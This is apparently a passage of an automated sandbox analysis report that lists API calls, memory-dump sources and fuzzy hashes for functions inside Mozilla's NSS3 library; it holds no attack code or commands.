sqlite3_exec.NSS3(?,?,6C8C2F70,?,?), ref: 6C8C2DF9
sqlite3_free.NSS3(00000000), ref: 6C8C2E2C
sqlite3_free.NSS3(?), ref: 6C8C2E3A
sqlite3_free.NSS3(?), ref: 6C8C2E52
sqlite3_mprintf.NSS3(6C92AAF9,?), ref: 6C8C2E62
sqlite3_free.NSS3(?), ref: 6C8C2E70
sqlite3_free.NSS3(?), ref: 6C8C2E89
sqlite3_free.NSS3(?), ref: 6C8C2EBB
sqlite3_free.NSS3(?), ref: 6C8C2ECB
sqlite3_free.NSS3(00000000), ref: 6C8C2F3E
sqlite3_free.NSS3(?), ref: 6C8C2F4C

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 0a8bea039f4bf473544912523c670e8ec52467406315f1ef7afc8a2bf8326fa4
Instruction ID: 9c9116456f7264d34cef298f82e6149ecbb2f2ff5c161b7f4c05db17bae33773
Opcode Fuzzy Hash: 0a8bea039f4bf473544912523c670e8ec52467406315f1ef7afc8a2bf8326fa4
Instruction Fuzzy Hash: 8561B3B5F012098BEB20CF68D988BDEB7B5EF58348F145424DD15A7781E739E844CBA2

Function 6C812C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C813F23,?,6C80E477,?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C812C62
EnterCriticalSection.KERNEL32(0000001C,?,6C80E477,?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C812C76
PL_HashTableLookup.NSS3(00000000,?,?,6C80E477,?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C812C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C80E477,?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C812C93

Part of subcall function 6C89DD70: TlsGetValue.KERNEL32 ref: 6C89DD8C
Part of subcall function 6C89DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C89DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C80E477,?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C812CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C80E477,?,?,?,00000001,00000000,?,?,6C813F23,?), ref: 6C812CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C80E477,?,?,?,00000001,00000000,?,?,6C813F23), ref: 6C812CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C80E477,?,?,?,00000001,00000000,?), ref: 6C812CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C80E477,?,?,?,00000001,00000000,?), ref: 6C812D4D
EnterCriticalSection.KERNEL32(?), ref: 6C812D61
PL_HashTableLookup.NSS3(?,?), ref: 6C812D71
PR_Unlock.NSS3(?), ref: 6C812D7E

Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07AD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07CD
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C77204A), ref: 6C7E07D6
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C77204A), ref: 6C7E07E4
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,6C77204A), ref: 6C7E0864
Part of subcall function 6C7E07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C7E0880
Part of subcall function 6C7E07A0: TlsSetValue.KERNEL32(00000000,?,?,6C77204A), ref: 6C7E08CB
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08D7
Part of subcall function 6C7E07A0: TlsGetValue.KERNEL32(?,?,6C77204A), ref: 6C7E08FB

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 0aa67c548248d84d91e3f4fac9c6452afdf003f60700f7539ef8a47c21e6e621
Instruction ID: 9fff72dd652089e46e463058072ffd40ae7867173f43531c6e8df40cc6d38b95
Opcode Fuzzy Hash: 0aa67c548248d84d91e3f4fac9c6452afdf003f60700f7539ef8a47c21e6e621
Instruction Fuzzy Hash: B15127B6D04205AFDB10AF28DD448AAB7B4BF1A31DB148934ED1897B12F731E968C7D1

Function 6C774C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774C97
EnterCriticalSection.KERNEL32(?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774CB0
PR_Unlock.NSS3(?,?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774D97
PR_Lock.NSS3(?,?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774DBA
PR_WaitCondVar.NSS3 ref: 6C774DD4
PR_Unlock.NSS3(?,?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774DEF

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: e85fd84cccc7110f82033416097a4b57f9b7342a110b565c903a6d7685557dc7
Instruction ID: 55b4fed96bbb4bc9af433a28f33a359079b65311e30e329e213c1b91639a3c39
Opcode Fuzzy Hash: e85fd84cccc7110f82033416097a4b57f9b7342a110b565c903a6d7685557dc7
Instruction Fuzzy Hash: E5416EB1A09619CFCF20AF78D6885597BF4BF06318F154A69D8889B750E730D894CFD1

Function 6C83ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C83DE64), ref: 6C83ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C83ED22

Part of subcall function 6C84B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C9218D0,?), ref: 6C84B095

PL_FreeArenaPool.NSS3(?), ref: 6C83ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C83ED6B
PR_CallOnce.NSS3(6C952AA4,6C8512D0), ref: 6C83ED38

Part of subcall function 6C774C70: TlsGetValue.KERNEL32(?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774C97
Part of subcall function 6C774C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774CB0
Part of subcall function 6C774C70: PR_Unlock.NSS3(?,?,?,?,?,6C773921,6C9514E4,6C8BCC70), ref: 6C774CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C83ED52
PR_CallOnce.NSS3(6C952AA4,6C8512D0), ref: 6C83ED83
PL_FreeArenaPool.NSS3(?), ref: 6C83ED95
PL_FinishArenaPool.NSS3(?), ref: 6C83ED9D

Part of subcall function 6C8564F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C85127C,00000000,00000000,00000000), ref: 6C85650E

Strings

security, xrefs: 6C83ED06

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 5f04916f6c0523192754656b75fe7f96a37bdf3fa860be2f6f18e8392c8a9295
Instruction ID: 253b65755bd1983070f56b3a614f1b58083784705577058e2a173db5e5c92ca7
Opcode Fuzzy Hash: 5f04916f6c0523192754656b75fe7f96a37bdf3fa860be2f6f18e8392c8a9295
Instruction Fuzzy Hash: 0C115E359002186BEB719A6DAE84BBB7274AF4160EF841C34E84862F80F765992C87D7

Function 6C822CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitToken), ref: 6C822CEC
PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6C822D07

Part of subcall function 6C9009D0: PR_Now.NSS3 ref: 6C900A22
Part of subcall function 6C9009D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C900A35
Part of subcall function 6C9009D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C900A66
Part of subcall function 6C9009D0: PR_GetCurrentThread.NSS3 ref: 6C900A70
Part of subcall function 6C9009D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C900A9D
Part of subcall function 6C9009D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C900AC8
Part of subcall function 6C9009D0: PR_vsmprintf.NSS3(?,?), ref: 6C900AE8
Part of subcall function 6C9009D0: EnterCriticalSection.KERNEL32(?), ref: 6C900B19
Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C900B48
Part of subcall function 6C9009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C900C76
Part of subcall function 6C9009D0: PR_LogFlush.NSS3 ref: 6C900C7E

PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C822D22

Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(?), ref: 6C900B88
Part of subcall function 6C9009D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C900C5D
Part of subcall function 6C9009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6C900C8D
Part of subcall function 6C9009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C900C9C
Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(?), ref: 6C900CD1
Part of subcall function 6C9009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C900CEC
Part of subcall function 6C9009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C900CFB
Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C900D16
Part of subcall function 6C9009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6C900D26
Part of subcall function 6C9009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C900D35
Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6C900D65
Part of subcall function 6C9009D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6C900D70
Part of subcall function 6C9009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C900D90
Part of subcall function 6C9009D0: free.MOZGLUE(00000000), ref: 6C900D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C822D3B

Part of subcall function 6C9009D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6C900BAB
Part of subcall function 6C9009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C900BBA
Part of subcall function 6C9009D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6C900D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6C822D54

Part of subcall function 6C9009D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C900BCB
Part of subcall function 6C9009D0: EnterCriticalSection.KERNEL32(?), ref: 6C900BDE
Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(?), ref: 6C900C16

Strings

pLabel = 0x%p, xrefs: 6C822D4F
C_InitToken, xrefs: 6C822CE7
ulPinLen = %d, xrefs: 6C822D36
slotID = 0x%x, xrefs: 6C822D02
pPin = 0x%p, xrefs: 6C822D1D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
API String ID: 420000887-1567254798
Opcode ID: c00d54ecce96e4d8b9715690a544d6e1fb8f36bf1b35775f76c0d2c382126c10
Instruction ID: 33429f478cdebaf5efec65d704e2cfe87a815656a5935a867174d63ab0a5a658
Opcode Fuzzy Hash: c00d54ecce96e4d8b9715690a544d6e1fb8f36bf1b35775f76c0d2c382126c10
Instruction Fuzzy Hash: 5F210D75305148EFDB109F58DE4CA463BB2EB8232EF944825F50493721DB38C958CBD1

Function 6C900EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6C7E2357), ref: 6C900EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C7E2357), ref: 6C900EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C900EE6

Part of subcall function 6C9009D0: PR_Now.NSS3 ref: 6C900A22
Part of subcall function 6C9009D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C900A35
Part of subcall function 6C9009D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C900A66
Part of subcall function 6C9009D0: PR_GetCurrentThread.NSS3 ref: 6C900A70
Part of subcall function 6C9009D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C900A9D
Part of subcall function 6C9009D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C900AC8
Part of subcall function 6C9009D0: PR_vsmprintf.NSS3(?,?), ref: 6C900AE8
Part of subcall function 6C9009D0: EnterCriticalSection.KERNEL32(?), ref: 6C900B19
Part of subcall function 6C9009D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C900B48
Part of subcall function 6C9009D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C900C76
Part of subcall function 6C9009D0: PR_LogFlush.NSS3 ref: 6C900C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C900EFA

Part of subcall function 6C7EAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C7EAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C900F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C900F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C900F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C900F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C900ED9, 6C900EE5, 6C900F06, 6C900F0B
Aborting, xrefs: 6C900EB3

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 6e370665c202b532c819847b116b0f7fe8f793170b48c4d923f0e5d8cbf9aaec
Instruction ID: e708cb7afa93ac84701cb0fdb9e98b2ee01cc715c7f4f1a5b46a65afdfe6e893
Opcode Fuzzy Hash: 6e370665c202b532c819847b116b0f7fe8f793170b48c4d923f0e5d8cbf9aaec
Instruction Fuzzy Hash: FBF0AFB69042147FEB003B609C4AC9B3E3DDF86268F008024FD0956602EA36E9189AF2

Function 6C864DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C864DCB

Part of subcall function 6C850FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C7F87ED,00000800,6C7EEF74,00000000), ref: 6C851000
Part of subcall function 6C850FF0: PR_NewLock.NSS3(?,00000800,6C7EEF74,00000000), ref: 6C851016
Part of subcall function 6C850FF0: PL_InitArenaPool.NSS3(00000000,security,6C7F87ED,00000008,?,00000800,6C7EEF74,00000000), ref: 6C85102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C864DE1

Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C8510F3
Part of subcall function 6C8510C0: EnterCriticalSection.KERNEL32(?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85110C
Part of subcall function 6C8510C0: PL_ArenaAllocate.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851141
Part of subcall function 6C8510C0: PR_Unlock.NSS3(?,?,?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C851182
Part of subcall function 6C8510C0: TlsGetValue.KERNEL32(?,6C7F8802,00000000,00000008,?,6C7EEF74,00000000), ref: 6C85119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C864DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C864E59

Part of subcall function 6C84FAB0: free.MOZGLUE(?,-00000001,?,?,6C7EF673,00000000,00000000), ref: 6C84FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C92300C,00000000), ref: 6C864EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C864EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C864F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C86521A

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 89ce936242abd1b0b9c3b1c268d61e60bff1a575a5aded72c666afd3acd47def
Instruction ID: b26929b2cfe8af48937ff824a79ec976592b9788cbe2d53d5d86e130dbc3193e
Opcode Fuzzy Hash: 89ce936242abd1b0b9c3b1c268d61e60bff1a575a5aded72c666afd3acd47def
Instruction Fuzzy Hash: C9F1ED71E00209CBDB24CF5AD9507AEB7B2FF85318F254529E815ABB81E775E981CF80

Function 6C860C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C862C2A), ref: 6C860C81

Part of subcall function 6C84BE30: SECOID_FindOID_Util.NSS3(6C80311B,00000000,?,6C80311B,?), ref: 6C84BE44

Part of subcall function 6C838500: SECOID_GetAlgorithmTag_Util.NSS3(6C8395DC,00000000,00000000,00000000,?,6C8395DC,00000000,00000000,?,6C817F4A,00000000,?,00000000,00000000), ref: 6C838517

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C860CC4

Part of subcall function 6C84FAB0: free.MOZGLUE(?,-00000001,?,?,6C7EF673,00000000,00000000), ref: 6C84FAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C860CD5
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C860D1D
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C860D3B
PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C860D7D
free.MOZGLUE(00000000), ref: 6C860DB5
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C860DC1
free.MOZGLUE(00000000), ref: 6C860DF7
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C860E05
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C860E0F

Part of subcall function 6C8395C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C817F4A,00000000,?,00000000,00000000), ref: 6C8395E0
Part of subcall function 6C8395C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C817F4A,00000000,?,00000000,00000000), ref: 6C8395F5
Part of subcall function 6C8395C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C839609
Part of subcall function 6C8395C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C83961D
Part of subcall function 6C8395C0: PK11_GetInternalSlot.NSS3 ref: 6C83970B
Part of subcall function 6C8395C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C839756
Part of subcall function 6C8395C0: PK11_GetIVLength.NSS3(?), ref: 6C839767
Part of subcall function 6C8395C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C83977E
Part of subcall function 6C8395C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C83978E

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441924520.000000006C94E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441954120.000000006C94F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441982455.000000006C950000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2442015569.000000006C955000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c770000_file.jbxd

Similarity

API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
String ID:
API String ID: 3136566230-0
Opcode ID: be2029f8e71adc0564cd690632de576af2ac5a6808776e1239da7d71b6bc88e8
Instruction ID: 8075afab5eed1b089447ebe4e3f6725823a9debfbe00f1d6d4f89f2d52077d6e
Opcode Fuzzy Hash: be2029f8e71adc0564cd690632de576af2ac5a6808776e1239da7d71b6bc88e8
Instruction Fuzzy Hash: 144106B1900205ABEB209F69DE45BAF7674EF0030DF104A34ED1557B41F735AA58CBEA

Function 6C7F4FD0 Relevance: 16.6, APIs: 11, Instructions: 112COMMON

Download Yara Rule

APIs

PR_NewLock.NSS3(00000001,00000000,6C940148,?,6C806FEC), ref: 6C7F502A
PR_NewLock.NSS3(00000001,00000000,6C940148,?,6C806FEC), ref: 6C7F5034
PL_NewHashTable.NSS3(00000000,6C84FE80,6C84FD30,6C89C350,00000000,00000000,00000001,00000000,6C940148,?,6C806FEC), ref: 6C7F5055
PL_NewHashTable.NSS3(00000000,6C84FE80,6C84FD30,6C89C350,00000000,00000000,?,00000001,00000000,6C940148,?,6C806FEC), ref: 6C7F506D

Memory Dump Source

Source File: 00000000.00000002.2441742558.000000006C771000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C770000, based on PE: true

Associated: 00000000.00000002.2441714267.000000006C770000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2441873319.000000006C90F000.00000002.00000001.01000000.00000007.sdmpDownload File
